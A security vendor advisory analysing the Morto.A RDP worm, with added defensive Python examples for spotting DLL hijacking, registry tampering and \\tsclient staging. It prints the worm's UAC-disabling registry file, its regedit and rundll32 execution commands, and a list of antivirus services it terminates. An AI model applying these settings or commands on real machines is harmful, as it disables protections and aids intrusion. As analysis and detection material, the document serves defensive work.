
Remote connection with rundll32


SonicWALL Security Center


RDP Worm Morto.A (Aug. 31, 2011)

Description

The SonicWALL UTM Research team received reports of a new Internet worm propagating in the wild. The worm targets Remote Desktop Protocol (RDP) and can download additional malicious components, terminate antivirus-related security processes and services, perform Distributed Denial-of-Service (DDoS) attacks, and be remotely controlled from a malicious server.

Process of Infection:

The worm targets machines over Remote Desktop Protocol (RDP) by compromising weak administrator passwords. Once a system is infected, it scans the local network for RDP listeners on port 3389, then tries a set of usernames and passwords to gain access to those machines and infect them.

Installation:

This worm has three components: Main executable, DLL loader, and the payload.

Main Executable

The main executable drops the DLL loader ntshrui.dll into the %windir%\temp directory and copies it as clb.dll into the %windir% directory.

It adds the following registry entries as part of its installation:

• HKLM\SYSTEM\Wpa\it
• HKLM\SYSTEM\Wpa\id
• HKLM\SYSTEM\Wpa\ie
• HKLM\SYSTEM\Wpa\sr
• HKLM\SYSTEM\Wpa\sn
• HKLM\SYSTEM\Wpa\md

It then deletes the following registry key to remove its tracks:

• HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU


The DLL loader clb.dll in the %windir% directory is loaded when the malware spawns the Registry Editor process (regedit.exe).

A legitimate clb.dll, the one regedit.exe actually uses, lives in %windir%\system32. But regedit.exe itself resides in %windir%, and Windows searches an application's own directory before %windir%\system32 when resolving a DLL, so the malware's clb.dll is loaded in place of the legitimate one.
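To make the search-order point concrete, here is an added example (not SonicWALL's code) that resolves a DLL name the way the standard, SafeDllSearchMode-enabled load-time search does, against a constructed file set; the %windir% value, the file list and the application paths are assumptions. It also shows that an executable outside %windir% would still get the legitimate copy.

```python
"""Resolve a DLL the way Windows load-time linking does (SafeDllSearchMode on):
application directory first, then system32, system, the Windows directory,
the current directory and PATH. Added example, not SonicWALL's code; the
file set and paths below are constructed for the Morto.A clb.dll case."""
import ntpath

WINDIR = r"C:\Windows"  # assumed %windir%

def search_order(exe_path, cwd, path_dirs):
    """Directories probed, in order, for a DLL that is not in KnownDLLs
    (a KnownDLLs entry always comes from system32; clb.dll is not one)."""
    return [ntpath.dirname(exe_path),
            ntpath.join(WINDIR, "system32"),
            ntpath.join(WINDIR, "system"),
            WINDIR,
            cwd,
            *path_dirs]

def resolve_dll(dll_name, exe_path, present_files, cwd=r"C:\Users\u", path_dirs=()):
    """Return the path that would be loaded for dll_name, or None if absent.
    present_files stands in for the file system (constructed set of paths)."""
    present = {p.lower() for p in present_files}
    for directory in search_order(exe_path, cwd, path_dirs):
        candidate = ntpath.join(directory, dll_name)
        if candidate.lower() in present:
            return candidate
    return None

# Constructed file system: the legitimate clb.dll, the dropped copy in %windir%,
# and regedit.exe, which ships in %windir% rather than system32.
FILES = {r"C:\Windows\system32\clb.dll",
         r"C:\Windows\clb.dll",
         r"C:\Windows\regedit.exe"}

def demo():
    """regedit.exe picks up the dropped copy; an app elsewhere does not."""
    hijacked = resolve_dll("clb.dll", r"C:\Windows\regedit.exe", FILES)
    untouched = resolve_dll("clb.dll", r"C:\Program Files\App\app.exe", FILES)
    return hijacked, untouched

if __name__ == "__main__":
    print(demo())
```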

DLL Loader

Once loaded by regedit.exe, the loader decrypts the payload DLL and loads it into memory. It also performs the following activities:

Added Registry:

Key: HKLM\SYSTEM\CurrentControlSet\Control\Windows
Value: "NoPopUpsOnBoot"
Data: "1"

Key: HKLM\SYSTEM\CurrentControlSet\Services\6to4\Parameters
Value: "ServiceDll"
Data: "%windir%\temp\ntshrui.dll"

Modified Registry:

Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters
Value: ServiceDll
Data Before: %SystemRoot%\system32\sens.dll
Data After: %SystemRoot%\system32\sens32.dll

Added Files:

%windir%\offline web pages\{Current Date}
%windir%\offline web pages\1.40_testDdos
%windir%\offline web pages\cache.txt - blocked as [ GAV: Morto.A_2 (Trojan) ]
%windir%\system32\sens32.dll - blocked as [ GAV: Morto.A_2 (Trojan) ]

DLL Payload

The payload attempts to connect to RDP servers on the local network through port 3389 using administrator accounts. Some of the accounts are shown below:

It copies the following files to the RDP workstations through \\tsclient\a\:

• \\tsclient\a\a.dll - blocked as [ GAV: Morto.A_2 (Trojan) ]
• \\tsclient\a\r.reg

The contents of r.reg, shown below, ensure that rundll32.exe runs the malware with administrator privileges and without prompting the user for permission for any system changes:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0


[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CuurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"c:\\winnt\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2008\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2k8\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win7\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows7\\system32\\rundll32.exe"="RUNASADMIN"
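A defender auditing a host for both the ServiceDll changes listed under the DLL loader section and the UAC and AppCompatFlags entries in r.reg above can check an exported .reg file for them. The scanner below is an added example (not SonicWALL's code); the .reg text it scans is constructed from the values in this write-up, and the SENS baseline path is taken from the "Data Before" line.

```python
"""Scan a .reg export for the registry changes described in this write-up:
ServiceDll values moved outside system32 or away from their baseline, UAC
switched off, and RUNASADMIN compatibility layers on rundll32.exe.
Added example (not SonicWALL's code); SAMPLE_REG is constructed."""
import re

SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Parameters]
"ServiceDll"="C:\\Windows\\temp\\ntshrui.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters]
"ServiceDll"="%SystemRoot%\\system32\\sens32.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"""

# Baseline from the write-up's "Data Before" line; extend per host build.
EXPECTED_SERVICEDLL = {"sens": r"%systemroot%\system32\sens.dll"}

def parse_reg(text):
    """Yield (key, value name, data) for string and dword values in a .reg file."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^"(.+?)"=(?:"(.*)"|dword:([0-9A-Fa-f]+))$', line)
        if m and key:
            name, text_val, dword = m.groups()
            data = int(dword, 16) if dword is not None else text_val.replace("\\\\", "\\")
            yield key, name, data

def find_tampering(text):
    """Return human-readable findings for the three patterns above."""
    findings = []
    for key, name, data in parse_reg(text):
        k, n, d = key.lower(), name.lower(), str(data).lower()
        if k.endswith(r"\parameters") and n == "servicedll":
            svc = k.rsplit("\\", 2)[-2]           # service name from the key path
            if "\\system32\\" not in d:
                findings.append(f"{svc}: ServiceDll outside system32 -> {data}")
            elif svc in EXPECTED_SERVICEDLL and d != EXPECTED_SERVICEDLL[svc]:
                findings.append(f"{svc}: ServiceDll changed -> {data}")
        elif k.endswith(r"\policies\system") and n in ("enablelua", "consentpromptbehavioradmin") and data == 0:
            findings.append(f"UAC weakened: {name}=0")
        elif k.endswith(r"\appcompatflags\layers") and n.endswith("rundll32.exe") and "runasadmin" in d:
            findings.append(f"RUNASADMIN layer on {name}")
    return findings
```

On a live host, `reg export HKLM\SYSTEM\CurrentControlSet\Services out.reg` (and the two policy keys) produces input in the same format.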

Once the files have been copied to the RDP workstations, the malware runs them with the following commands:

• "regedit /s \\tsclient\a\r.reg"
• "rundll32 \\tsclient\a\a.dll a"
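Both commands hand a signed Windows binary a file on the \\tsclient\ drive-redirection share, which is a usable detection hook. The matcher below is an added example (not SonicWALL's code) run over constructed process-creation records in a simplified key=value layout; the log format and the sample lines are assumptions.

```python
"""Flag process creations where regedit.exe or rundll32.exe is given a path
under \\tsclient\, the RDP client drive redirection share the worm uses to
stage r.reg and a.dll. Added example (not SonicWALL's code); the log lines
are constructed in a simplified key=value layout."""
import re

# Constructed records: the two commands from the write-up, a benign rundll32
# use, and ordinary RDP file access by explorer.exe that should not fire.
LOG_LINES = [
    r"Image=C:\Windows\regedit.exe CommandLine=regedit /s \\tsclient\a\r.reg",
    r"Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32 \\tsclient\a\a.dll a",
    r"Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32 shell32.dll,Control_RunDLL",
    r"Image=C:\Windows\explorer.exe CommandLine=explorer \\tsclient\c\docs",
]

TSCLIENT = re.compile(r"\\\\tsclient\\", re.IGNORECASE)   # literal \\tsclient\
LOADERS = ("regedit.exe", "rundll32.exe")                  # binaries the worm abuses

def parse_line(line):
    """Split one record into (image path, command line); None image on mismatch."""
    m = re.match(r"Image=(\S+) CommandLine=(.*)$", line)
    return (m.group(1), m.group(2)) if m else (None, "")

def suspicious(lines):
    """Return (image name, command line) for loader binaries fed a \\tsclient\ path."""
    hits = []
    for line in lines:
        image, cmd = parse_line(line)
        if image and image.lower().endswith(LOADERS) and TSCLIENT.search(cmd):
            hits.append((image.rsplit("\\", 1)[-1].lower(), cmd))
    return hits

if __name__ == "__main__":
    for image, cmd in suspicious(LOG_LINES):
        print(image, "<-", cmd)
```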

It also terminates the following services belonging to antivirus and security software:

• 360rp
• a2service
• ACAAS
• ArcaConfSV
• AvastSvc
• avguard
• avgwdsvc
• avp
• avpmapp
• ccSvcHst
• cmdagent
• coreService
• FortiScand
• FPAVServer
• freshclam
• fsdfwd
• GDFwSvc
• K7RTScan
• knsdave
• KVSrvXP
• kxescore
• mcshield
• MPSvc
• MsMpEng
• NSESVC.EXE
• PavFnSvr
• RavMonD
• SavService
• scanwscs
• Shell
• SpySweeper
• Vba32Ldr
• vsserv
• zhudongfangyu

Network Activities:

The malware tries to contact the following URLs:

• qf{REMOVED}.net
• ms.ji{REMOVED}nfo
• ms.ji{REMOVED}o.cc
• ms.ji{REMOVED}o.be

SonicWALL Gateway AntiVirus provides protection against this worm via the following signatures:

GAV: Morto.A (Worm)
GAV: Morto.A_2 (Trojan)